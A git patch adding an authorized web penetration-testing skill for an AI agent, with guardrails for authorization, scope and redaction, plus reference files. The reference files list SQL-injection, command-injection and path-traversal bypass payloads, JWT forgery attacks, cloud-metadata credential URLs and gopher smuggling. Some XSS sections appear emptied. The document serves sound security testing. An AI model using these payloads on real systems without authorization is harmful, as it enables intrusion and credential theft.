From 263e008d6bebbf3c7f67eaff8c4d71429c9b361f Mon Sep 17 00:00:00 2001 From: Teknium <127238744+teknium1@users.noreply.github.com> Date: Mon, 25 May 2026 14:51:41 -0700 Subject: [PATCH] feat(skills): add web-pentest optional skill (#32265) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Adds optional-skills/security/web-pentest/ — an authorized web app penetration testing skill adapted from Shannon's methodology (concepts only; AGPL-clean fresh implementation). Phased: recon (read-only) → vuln analysis (delegate_task per OWASP class) → proof-based exploitation → report. Guardrails baked in: - Authorization gate before first active scan (templates/authorization.md) - Scope allowlist (scope.txt) consulted by recon-scan.sh and documented as the rule for every active request - Aux-client leakage warning (compression + title gen replay history; payloads/creds must not enter chat verbatim) - Bypass-exhaustion discipline before false-positive classification - L3/L4 (proof-required) for reportable findings; L1/L2 listed as candidates only Closes #400. Supersedes #21845 (plugin-shaped proposal; skill-shaped is cheaper and matches the existing optional-skills/security/ pattern). --- optional-skills/security/web-pentest/SKILL.md | 333 ++++++++++++++++++ .../references/bypass-techniques.md | 133 +++++++ .../references/exploitation-techniques.md | 204 +++++++++++ .../references/scope-enforcement.md | 110 ++++++ .../web-pentest/references/vuln-taxonomy.md | 81 +++++ .../web-pentest/scripts/recon-scan.sh | 126 +++++++ .../web-pentest/templates/authorization.md | 69 ++++ .../templates/exploitation-queue.json | 34 ++ .../web-pentest/templates/pentest-report.md | 178 ++++++++++ 9 files changed, 1268 insertions(+) create mode 100644 optional-skills/security/web-pentest/SKILL.md create mode 100644 optional-skills/security/web-pentest/references/bypass-techniques.md create mode 100644 optional-skills/security/web-pentest/references/exploitation-techniques.md create mode 100644 optional-skills/security/web-pentest/references/scope-enforcement.md create mode 100644 optional-skills/security/web-pentest/references/vuln-taxonomy.md create mode 100755 optional-skills/security/web-pentest/scripts/recon-scan.sh create mode 100644 optional-skills/security/web-pentest/templates/authorization.md create mode 100644 optional-skills/security/web-pentest/templates/exploitation-queue.json create mode 100644 optional-skills/security/web-pentest/templates/pentest-report.md diff --git a/optional-skills/security/web-pentest/SKILL.md b/optional-skills/security/web-pentest/SKILL.md new file mode 100644 index 00000000000..1ea82f8f0a7 --- /dev/null +++ b/optional-skills/security/web-pentest/SKILL.md @@ -0,0 +1,333 @@ +--- +name: web-pentest +description: | + Authorized web application penetration testing — reconnaissance, vulnerability + analysis, proof-based exploitation, and professional reporting. Adapts + Shannon's "No Exploit, No Report" methodology with hard guardrails for + scope, authorization, and aux-client leakage. Active testing against running + applications you own or have written authorization to test. +platforms: [linux, macos] +category: security +triggers: + - "pentest [URL]" + - "pentest this app" + - "penetration test [URL]" + - "security test this web app" + - "test [URL] for vulnerabilities" + - "find vulns in [URL]" + - "OWASP test [URL]" +toolsets: + - terminal + - web + - browser + - file + - delegation +--- + +# Web Application Penetration Testing + +A phased pentesting workflow for running web applications. Adapted from +Shannon's pipeline (Keygraph, AGPL — concepts only, no code borrowed). +Built around three rules: + +1. No exploit, no report — every finding requires reproducible evidence. +2. Bounded scope — every active request goes against a target the operator + pre-declared. Off-scope hosts are refused. +3. Bypass exhaustion before false-positive dismissal — a "blocked" payload + is not a clean bill of health until you've tried the bypass set. + +--- + +## ⚠️ Hard Guardrails — Read Before Every Engagement + +Violating any of these invalidates the engagement and may be illegal. + +1. **Authorization gate.** Before the first active scan in a session, you + MUST confirm with the user, in writing, that they own or have written + authorization to test the target. Record the acknowledgement in + `engagement/authorization.md` (see template). No acknowledgement → no + active scanning. Reading public pages with `curl` is fine; sending + payloads is not. + +2. **Scope allowlist.** Maintain `engagement/scope.txt` — one hostname or + CIDR per line. Every `nmap`, `curl`, `whatweb`, browser navigation, or + payload-bearing request MUST be against an entry in scope. If a target + redirects you off-scope (3xx to a different host, a link in HTML), + STOP and confirm with the user before following. + +3. **No production systems without paper.** If the user hasn't told you + "yes, prod is in scope and I have written sign-off," assume not. Default + targets are staging, local docker, dedicated test instances. + +4. **Cloud metadata is off by default.** Do not probe `169.254.169.254`, + `metadata.google.internal`, `100.100.100.200`, `[fd00:ec2::254]`, or + equivalent unless the engagement explicitly includes SSRF-to-metadata + as a goal AND the target is one you control. The agent's browser tool + can reach these from inside your own infrastructure — don't. + +5. **Destructive payloads need approval.** SQLi payloads that DROP/DELETE, + filesystem-write SSTI, command injection with `rm`/`shutdown`/`mkfs`, + anything that mutates beyond a single test row → ASK FIRST. The + `approval.py` system catches some; don't rely on it alone. + +6. **Aux-client leakage risk (Hermes-specific).** This skill produces + sessions full of SQLi/XSS/RCE payloads, captured credentials, JWT + tokens. Hermes' compression and title-generation paths replay history + through the auxiliary client (often the main model). Anything sensitive + you write to the conversation can leave the box on the next compress. + Mitigation: + - Redact captured tokens/credentials to the LAST 6 CHARS before logging + them in any message. Full values go to `engagement/evidence/` files, + never into chat history. + - If the engagement is sensitive, set `auxiliary.title_generation.enabled: false` + in `~/.hermes/config.yaml` for the session. + +7. **Rate limit yourself.** Default 200ms between active requests against + any single host. The recon-scan.sh script enforces this. Don't bypass + it without operator approval. + +8. **Authority of the report.** This skill produces a security + assessment, not a "PASS." Even a clean run is "no exploitable issues + FOUND in scope X within time T using methods Y" — not "the application + is secure." Mirror that language in the report. + +--- + +## Phase 0: Engagement Setup + +Before any scanning happens, create the engagement directory and +authorization acknowledgement. + +```bash +ENGAGEMENT=engagement-$(date +%Y%m%d-%H%M%S) +mkdir -p "$ENGAGEMENT"/{evidence,findings,reports} +cd "$ENGAGEMENT" +``` + +1. **Ask the user (verbatim):** + > "Confirm: (a) the target URL is [X], (b) you own this application + > or have written authorization to test it, and (c) the engagement + > may run for up to [N] hours starting now. Reply 'authorized' to + > proceed." + +2. **Wait for explicit `authorized` response.** Any other answer means STOP. + +3. **Record authorization** to `engagement/authorization.md` using the + template in `templates/authorization.md`. Include: + - Target URL(s) and IP(s) + - Authorization basis (ownership / written authz from $name) + - Engagement window + - Out-of-scope items (production, third-party services, etc.) + - Operator name (the user driving this session) + +4. **Build scope.txt:** + ``` + localhost + 127.0.0.1 + staging.example.com + 192.168.1.0/24 # internal lab only, with operator OK + ``` + +5. **Read** `references/scope-enforcement.md` before issuing the first + active request — that doc has the host-extraction rules you apply + to every command/URL before it goes out. + +--- + +## Phase 1: Pre-Recon (Code Analysis, optional) + +Skip if no source access (black-box engagement). + +If you have read access to the application source: + +1. **Map the architecture** — framework, routing, middleware stack +2. **Inventory sinks** — every `execute(`, `os.system(`, `eval(`, + template render, file read/write, redirect target +3. **Map auth** — session cookie vs JWT, OAuth flows, password reset, + privileged endpoints +4. **Identify trust boundaries** — what's authenticated, what's not, + what comes from `request.*` +5. **Backward taint** from each sink to a request source. Early-terminate + when proper sanitization is found (parameterized queries, allowlists, + `shlex.quote`, well-known escapers). + +Output: `evidence/pre-recon.md` — architecture map, sink inventory, +suspected vulnerable code paths. + +This is OFFLINE work. No traffic to the target. + +--- + +## Phase 2: Recon (Live, Read-Only) + +Maps the attack surface. All requests are GETs of public pages, no +payloads yet. Still scope-bounded. + +1. **Verify scope.** Resolve every target hostname → IP. Confirm IPs are + in scope (avoids the "DNS points somewhere unexpected" trap). + +2. **Network surface** (only if scope permits port scanning): + ```bash + nmap -sT -T3 --top-ports 100 -oN evidence/nmap.txt $TARGET + ``` + Use `-T3` (default), not `-T4/-T5`. Stealthier and avoids tripping + IDS/IPS in shared environments. + +3. **Tech fingerprint:** + ```bash + whatweb -v $TARGET_URL > evidence/whatweb.txt + curl -sIk $TARGET_URL > evidence/headers.txt + ``` + +4. **Endpoint discovery:** + - Crawl the app with the browser tool (`browser_navigate`, + `browser_get_images`, follow links). + - Inspect `robots.txt`, `sitemap.xml`, `.well-known/*`. + - Use the developer tools network panel via browser tool to capture + XHR/fetch calls. + +5. **Auth surface:** Identify login, registration, password reset, + session cookie names, token formats. Do NOT send credentials yet — + just observe. + +6. **Correlate with pre-recon** (if you have source). For each + `evidence/pre-recon.md` finding, mark whether the live surface + confirms it's reachable. + +Output: `evidence/recon.md` — endpoints, technologies, auth model, +input vectors. + +--- + +## Phase 3: Vulnerability Analysis + +One delegate_task per vulnerability class. Each agent reads +`evidence/recon.md` (+ `evidence/pre-recon.md` if present), produces +`findings/-queue.json` using `templates/exploitation-queue.json`. + +Use `delegate_task` with these focused subagents (parallel where possible): + +| Class | Goal | Reference | +|-------|------|-----------| +| `injection` | SQLi, command, path traversal, SSTI, LFI/RFI, deserialization | `references/vuln-taxonomy.md` (slot types) | +| `xss` | Reflected, stored, DOM-based | `references/vuln-taxonomy.md` (render contexts) | +| `auth` | Login bypass, JWT confusion, session fixation, OAuth flaws | `references/exploitation-techniques.md` | +| `authz` | IDOR, vertical/horizontal escalation, business logic | `references/exploitation-techniques.md` | +| `ssrf` | Internal reachability, metadata, protocol smuggling | Skip metadata unless explicitly authorized | +| `infra` | Misconfig, info disclosure, default creds, exposed admin | `references/exploitation-techniques.md` | + +Each queue entry has: id, vuln class, source (file:line if known), +endpoint, parameter, slot type, suspected defense, verdict +(`identified` / `partial` / `confirmed` / `critical`), witness payload, +confidence (0-1), notes. + +The analysis phase doesn't send malicious payloads yet — it stages them. +The exploitation phase actually fires them. + +--- + +## Phase 4: Exploitation (Proof-Based, Conditional) + +Only run a sub-agent per class where the analysis queue has actionable +entries (`identified` or `partial`). + +For each candidate: + +1. **Pre-send check** — host in scope? auth gate satisfied? payload + approved if destructive? +2. **Send the witness payload** — minimal proof. SQLi: `' AND 1=1--` + then `' AND 1=2--`. XSS: a benign marker like + ``. Never `alert(1)` in + stored XSS — it'll fire for other users in shared environments. +3. **Verify the witness fires** — for blind injection, use a sleep + probe (`SLEEP(5)`) and time the response. For SSRF, use a + tester-controlled callback host you own (NOT a public service like + webhook.site for sensitive engagements — exfil paths). +4. **Promote level:** + - **L1 Identified** — pattern matched, no behavior change + - **L2 Partial** — sink reached, but defense in place + - **L3 Confirmed** — payload changed app behavior in observable way + - **L4 Critical** — data extracted, code executed, access escalated +5. **Bypass exhaustion before classifying as FP.** For each candidate + that blocks: try at least the bypass set in + `references/bypass-techniques.md` for that class. Only after the set + is exhausted may you write `verdict: false_positive`. +6. **Record evidence** for every L3/L4: + - Full request (method, URL, headers, body) + - Response (status, headers, relevant body excerpt) + - Reproducer command (curl one-liner) + - Impact statement + +Output: `findings/exploitation-evidence.md` + +**Redact in evidence files:** +- Any captured credentials/tokens → last 6 chars only in chat; + full value to `findings/secrets-vault.md` (gitignored). +- Other users' PII → redact. +- Your test credentials → fine to keep. + +--- + +## Phase 5: Reporting + +Generate the final report using `templates/pentest-report.md`. Sections: + +1. Executive summary +2. Engagement scope (from `engagement/scope.txt`) +3. Authorization (from `engagement/authorization.md`) +4. Findings (L3/L4 only — proof-required). Per finding: + - Title, severity (CVSS 3.1), CWE + - Affected endpoint(s) + - Proof (request + response excerpt) + - Reproduction steps + - Impact + - Remediation +5. Not-exploited candidates (L1/L2 with notes on what blocked them) +6. Out-of-scope observations +7. Methodology / tools used +8. Limitations and what was NOT tested + +**Severity policy:** CVSS only for L3/L4. L1/L2 are "candidates pending +verification" — don't assign CVSS to unverified findings. + +--- + +## When to Stop + +- The user revokes authorization. +- A candidate finding clearly impacts production data and you don't have + approval for destructive testing — STOP and ask. +- The target starts returning 503/429 storms — back off, reconvene with + the operator. +- You discover something *outside* the contracted scope (e.g. an exposed + customer database while testing an unrelated endpoint). STOP, document, + report to the operator. Do not pivot without explicit approval — that + pivot is what makes pentesting illegal. + +--- + +## What This Skill Does NOT Cover + +- Network-layer pentesting beyond port scanning (no Metasploit, + Cobalt Strike, AD attacks, network protocol fuzzing). +- Reverse engineering / binary analysis (see issue #383). +- Source-only static analysis (see issue #382). +- Active social engineering / phishing. +- Anything against systems the operator hasn't pre-authorized. + +If the engagement needs any of these, escalate to a professional +pentester. This skill complements professional pentesting; it does +not replace it. + +--- + +## Further Reading + +- `references/scope-enforcement.md` — how to bound every active request +- `references/vuln-taxonomy.md` — slot types, render contexts, OWASP map +- `references/exploitation-techniques.md` — per-class payload patterns +- `references/bypass-techniques.md` — common WAF/filter bypasses +- `templates/authorization.md` — engagement authorization template +- `templates/pentest-report.md` — final report template +- `templates/exploitation-queue.json` — per-class finding queue schema +- `scripts/recon-scan.sh` — rate-limited nmap+whatweb+headers wrapper diff --git a/optional-skills/security/web-pentest/references/bypass-techniques.md b/optional-skills/security/web-pentest/references/bypass-techniques.md new file mode 100644 index 00000000000..aef2a18bf8b --- /dev/null +++ b/optional-skills/security/web-pentest/references/bypass-techniques.md @@ -0,0 +1,133 @@ +# Bypass Techniques + +Common filter/WAF bypasses. Used during the bypass-exhaustion phase +before classifying a finding as false positive. + +A finding may only be marked `false_positive` AFTER the relevant +bypass set has been exhausted and the witnesses still fail. + +## SQL Injection Bypasses + +When `'` is filtered/escaped: +- Numeric injection: drop the quote, use `1 OR 1=1` +- Different quote: `"` instead of `'` +- Comment-based: `1/**/OR/**/1=1` +- Hex literal: `0x61646d696e` for `admin` +- `CHAR(65,66)` for `AB` +- Case variation: `OoRr` (often stripped to `OR`) +- Inline comments: `O/**/R` +- Null byte: `' %00 OR '1`=`1` +- Double URL encoding: `%2527` for `'` +- Multi-byte: `%bf%27` (works against some single-byte unescape) + +## Command Injection Bypasses + +When semicolons filtered: +- Newline: `%0Asleep 5` +- Carriage return: `%0Dsleep 5` +- Pipe: `|sleep 5`, `||sleep 5` +- Background: `&sleep 5`, `&&sleep 5` +- Substitution: `$(sleep 5)`, `` `sleep 5` `` +- Globbing: `/???/?l??p 5` for `/bin/sleep 5` +- IFS for spaces: `sleep${IFS}5`, `sleep$IFS$95` +- Quote evasion: `s""leep 5`, `s'l'eep 5` +- Variable: `a=sl;b=eep;${a}${b} 5` +- Encoding: `bash<<<$(base64 -d <<< c2xlZXAgNQo=)` + +## Path Traversal Bypasses + +When `../` filtered: +- URL-encoded: `%2e%2e%2f` +- Double URL-encoded: `%252e%252e%252f` +- Unicode: `%c0%ae%c0%ae%c0%af`, `%uff0e%uff0e%u2215` +- Mixed: `..%2f`, `%2e./` +- Null byte (older platforms): `../../../etc/passwd%00.png` +- Backslash on Windows: `..\..\..\windows\win.ini` +- Absolute path: `/etc/passwd` (skips traversal entirely) + +When base dir is prepended (`/var/www/uploads/${v}`): +- The traversal still works if `realpath` not enforced +- Try ending the path early: `../../etc/passwd%00` + +## XSS Bypasses + +When `` +- `` +- ``. Confirm the +sink fires. + +## Auth + +### Login Bypass + +- SQLi in login: `' OR '1'='1` (very old, but check) +- Boolean defaults: `username: admin, password: admin/password/123456` + (only on lab targets, not production) +- Account enumeration: timing or response difference between + "unknown user" vs "wrong password" +- Rate limiting: send 50 wrong passwords in 30s; see if you're throttled + +### JWT Attacks + +1. **alg:none**: change header to `{"alg":"none","typ":"JWT"}`, strip + signature. If accepted → critical. +2. **alg confusion**: HS256 signed with the RS256 public key. If the + server stores the RS256 cert as a "secret" and the algorithm is + attacker-controlled, this works. +3. **Weak HMAC secret**: try `jwt_tool` or `hashcat` against the JWT + with rockyou.txt (only if you have operator OK to crack). +4. **kid header injection**: `kid` set to a SQLi payload or path-traversal + to load a known key. +5. **Expired token still accepted**: replay an old token. + +### Session + +- Cookie attrs: `Secure`, `HttpOnly`, `SameSite=Strict|Lax`. +- Session fixation: log in, note cookie, log out, log in again — same + cookie? Vulnerable. +- Logout: does logout invalidate server-side, or just clear the client? + +### Password Reset + +- Predictable token (timestamp, sequential, weak random) +- Host header poisoning in reset link (`Host: evil.test`) +- No rate limit on reset endpoint +- Token reuse / no expiry +- Email enumeration via reset response + +## Authz (Access Control) + +### IDOR + +Pattern: change `?id=123` to `?id=124`. If you see another user's data, +L3 confirmed. + +Variants: +- Sequential IDs (easy) +- UUIDs (still try — they leak in logs/responses) +- Mass assignment: send extra params like `is_admin: true`, `role: admin` +- HTTP method override: `GET /users/123` works, but `PUT /users/123` is + not authz-checked + +### Privilege Escalation + +Vertical: regular user → admin endpoint. Check: +- `/admin/*` accessible to non-admin? +- `role` field in JWT/session client-editable? +- Tenant ID swap: `tenant_id=mine` → `tenant_id=theirs` + +Horizontal: user A → user B same role. Reuse IDOR patterns. + +### Business Logic + +- Negative quantity in cart +- Race conditions (double-spend, atomicity) +- Workflow skip (POST to step 3 without doing step 2) +- Coupon stacking +- Discount > total + +## SSRF + +Witnesses for SSRF probing (only to hosts the operator approved): + +- Operator-owned callback (`https://hermes-callback.example/abcdef`) + — confirms the request left the target's network +- Internal recon (operator OK + scope): `http://127.0.0.1:6379/`, + `http://127.0.0.1:9200/`, `http://[::1]:80/` + +Cloud metadata (operator OK + your own infra): +- AWS: `http://169.254.169.254/latest/meta-data/iam/security-credentials/` +- GCP: `http://metadata.google.internal/computeMetadata/v1/` (needs + `Metadata-Flavor: Google`) +- Azure: `http://169.254.169.254/metadata/identity/oauth2/token` +- Alibaba/Aliyun: `http://100.100.100.200/` + +Protocol smuggling: +- `gopher://` for Redis/Memcache/SMTP attacks (only with operator OK) +- `file:///` for local file read +- `dict://` for service probing + +## Infra + +- Headers audit: missing `Strict-Transport-Security`, `Content-Security-Policy`, + `X-Content-Type-Options: nosniff`, `X-Frame-Options`/`frame-ancestors`, + `Referrer-Policy` +- TLS audit: weak ciphers, missing HSTS, mixed content +- Information disclosure: `Server:`, `X-Powered-By:`, error stack traces, + default landing pages (`/server-status`, `/.git/`, `/.env`, `/phpinfo.php`) +- Default creds: only on lab targets +- Open redirects: `?next=https://evil.example/` — confirms misuse for + phishing chains + +## Defense Recognition (don't waste cycles) + +Skip past these — they're working defenses, not vulns: + +- Parameterized queries via the language's standard binding +- Content Security Policy with no `unsafe-inline`/`unsafe-eval` and + a strict source list +- argv-list subprocess invocation (Python `subprocess.run([...])` + without `shell=True`) +- `yaml.safe_load`, JSON-only deserialization +- Allowlist-based redirects to a small set of known hosts +- Auth checks with explicit "owner == current_user" on every record fetch +- JWT verification with both `alg` allowlist and `iss`/`aud`/`exp` checks diff --git a/optional-skills/security/web-pentest/references/scope-enforcement.md b/optional-skills/security/web-pentest/references/scope-enforcement.md new file mode 100644 index 00000000000..df019410fd4 --- /dev/null +++ b/optional-skills/security/web-pentest/references/scope-enforcement.md @@ -0,0 +1,110 @@ +# Scope Enforcement + +The pentest skill is dangerous because Hermes can drive network tools +unattended. The single most important rule: **every active request must +target a host the operator authorized.** This file is the procedure. + +## The Three Authorities + +1. `engagement/authorization.md` — what the operator wrote down. +2. `engagement/scope.txt` — the machine-readable allowlist. +3. The current shell prompt — implicit: "I'm running as Hermes inside + the operator's box." + +If any of those three disagree, you STOP and ask. Don't try to reconcile. + +## scope.txt format + +One target per line. Comments with `#`. + +``` +# Hostnames — resolved at use time +localhost +127.0.0.1 +::1 +staging.example.com +api-staging.example.com + +# CIDR — internal labs only, requires operator OK in writing +192.168.50.0/24 +10.0.5.0/24 +``` + +Wildcards are NOT supported. If you need `*.staging.example.com`, list +each host explicitly. This is on purpose: subdomain wildcards in +authorization scope are how unauthorized testing happens. + +## Host Extraction Rules + +Before any active request, extract the target host from the command +or URL and confirm it's in scope. + +| Surface | Where the host lives | Example | +|---------|----------------------|---------| +| `curl URL` | The URL | `curl https://staging.example.com/login` | +| `curl --resolve HOST:PORT:ADDR` | HOST | reject — resolve overrides scope | +| `nmap TARGET` | Each TARGET arg | `nmap 10.0.5.5 staging.example.com` | +| `whatweb URL` | The URL | `whatweb https://staging.example.com` | +| `browser_navigate(url)` | The URL | python-side: extract host from `url` | +| Tool-driven HTTP (sqlmap, wfuzz, gobuster) | `-u`, `-h`, target arg | depends on tool | + +For URLs: `urllib.parse.urlparse(url).hostname.lower()`. +For raw IPs: keep as IP, check against CIDR entries with +`ipaddress.ip_address(host) in ipaddress.ip_network(cidr)`. + +## Pre-Send Checklist + +For every active request, before you press enter: + +1. Did you extract the host correctly? (URL host, not Host header, not + `--resolve` aliasing.) +2. Is the host in scope.txt (exact hostname match) OR is its resolved + IP in a scope.txt CIDR? +3. If it's a redirect target you're following, did you re-check scope + on the redirect URL? +4. If it's the second hop of an SSRF probe, is the inner URL in scope? + (Usually NOT — that's the whole point. Don't auto-fire.) +5. Did the operator approve this class of payload? (Read-only recon + is auto-OK; destructive payloads need explicit OK.) + +If any answer is "no" or "not sure," STOP and ask the operator. + +## Things That Look In-Scope But Aren't + +- **Redirects to a parent or sister host.** `staging.example.com` → + `auth.example.com` is a different host. Stop, re-confirm. +- **CNAMEs.** `app.staging.example.com` may CNAME to + `prod-cluster.aws.example.com`. Resolve and check IP, not just name. +- **Cloud metadata IPs.** `169.254.169.254` is not in any sane + scope.txt. If your SSRF candidate resolves there, you're probably + testing against a real cloud host and need explicit approval before + the probe. +- **127.0.0.1 / localhost on a shared box.** If you're in a container + or shared dev box, `localhost` may be someone else's service. + Confirm with the operator that 127.0.0.1 means what they think. +- **External services the target depends on.** Stripe API, OAuth + providers, S3 buckets — even if your tests would touch them, they + are NOT in scope by default. + +## When Scope Fails Open + +If you can't decide whether a host is in scope: + +``` +DEFAULT: out of scope. +``` + +Stop the agent. Ask the operator. Resume only after written +confirmation. There is no penalty for asking; there is significant +penalty for testing the wrong host. + +## Logging + +Every active request should append to `engagement/request-log.jsonl`: + +```json +{"ts": "2026-05-25T03:14:15Z", "method": "GET", "url": "https://staging.example.com/api/users", "host": "staging.example.com", "in_scope": true, "phase": "recon", "result_status": 200, "evidence_ref": "evidence/recon.md#endpoints"} +``` + +This is your audit trail. If anyone ever asks "why did the pentest +agent hit X?" you can answer from this log. diff --git a/optional-skills/security/web-pentest/references/vuln-taxonomy.md b/optional-skills/security/web-pentest/references/vuln-taxonomy.md new file mode 100644 index 00000000000..bed84d835b6 --- /dev/null +++ b/optional-skills/security/web-pentest/references/vuln-taxonomy.md @@ -0,0 +1,81 @@ +# Vulnerability Taxonomy + +Two classification systems used during analysis. Both come from Shannon +(concepts only; rewritten here). Both exist to make the question +"is this exploitable?" mechanical instead of vibes-based. + +## Injection: Slot Types + +Every injection sink has a **slot type** — the lexical position the +attacker payload lands in. Each slot type has a small set of +**required defenses**. A mismatch is a vulnerability. The same defense +applied to the wrong slot is also a vulnerability. + +| Slot | Example | Required defense | +|------|---------|------------------| +| `SQL-val` | `SELECT * FROM u WHERE id = :v` | Parameterized binding | +| `SQL-ident` | `SELECT * FROM ${table}` | Allowlist on identifier values | +| `SQL-keyword` | `ORDER BY ${col} ${dir}` | Allowlist on column AND direction | +| `CMD-argument` | `subprocess.run(["ls", v])` | argv list (never shell=True) | +| `CMD-shell` | `os.system("ls " + v)` | DON'T — refactor to argv list | +| `PATH-segment` | `open("/data/" + v)` | Normalize + allowlist + base-relative check | +| `URL-host` | redirect to `https://${v}/x` | Allowlist of acceptable hosts | +| `URL-fetch` | `requests.get(v)` | Allowlist + block private/metadata IPs (SSRF) | +| `TEMPLATE-string` | `Template("Hello {{ v }}")` | Autoescape ON, no user-controlled template syntax | +| `DESERIALIZE-pickle` | `pickle.loads(v)` | DON'T — use JSON / msgpack | +| `DESERIALIZE-yaml` | `yaml.load(v)` | `yaml.safe_load`, never `yaml.load` | +| `XPATH-expr` | `tree.xpath("//u[@id='" + v + "']")` | Parameterized XPath or escape | +| `LDAP-filter` | `(uid=${v})` | LDAP filter escaping | +| `REGEX-pattern` | `re.search(v, text)` | Don't take pattern from user (ReDoS too) | +| `LOG-record` | `log.info("got " + v)` | Encode CR/LF/control chars before logging | +| `EMAIL-header` | `Subject: ${v}` | Reject CR/LF | +| `HTTP-header` | `Set-Cookie: ${v}` | Reject CR/LF (response splitting) | + +When you classify a finding: +1. Identify the slot type +2. Identify the actual defense in the code (if you have source) +3. If defense doesn't match the required-defense set: vulnerable + +## XSS: Render Contexts + +XSS exploitability depends on **where** in the HTML/JS the value lands. +Encoding for one context doesn't protect another. + +| Context | Example | Required encoding | +|---------|---------|-------------------| +| `HTML_BODY` | `
{{ v }}
` | HTML entity encode `<>&"'` | +| `HTML_ATTR_QUOTED` | `` | HTML attr encode | +| `HTML_ATTR_UNQUOTED` | `` | Almost impossible to safely encode; quote the attr | +| `URL_ATTR` (href/src) | `` | Validate scheme allowlist + attr encode | +| `JAVASCRIPT_STRING` | `` | JS string escape + ensure quote consistency | +| `JAVASCRIPT_BLOCK` | `` | DON'T — refactor; no safe encoding | +| `CSS_VALUE` | `` | CSS encode + allowlist scheme/format | +| `CSS_BLOCK` | `` | DON'T — refactor | +| `JSON_RESPONSE` (consumed by JS) | `JSON.parse(response)` | JSON encode + correct content-type header | +| `EVENT_HANDLER` | `
` | JS string escape *inside* HTML attr encode | +| `URL_PATH` (router-driven) | route param echoed unencoded | URL-encode + HTML-encode | +| `DOM_INNERHTML` | `el.innerHTML = v` (DOM XSS) | Use `textContent` instead, or DOMPurify | +| `DOM_DOC_WRITE` | `document.write(v)` | DON'T — refactor | + +When you classify: +1. Identify the render context where user input lands +2. Identify the encoding applied +3. Mismatch = vulnerable. Even "HTML encoded" output in + `JAVASCRIPT_STRING` is exploitable (`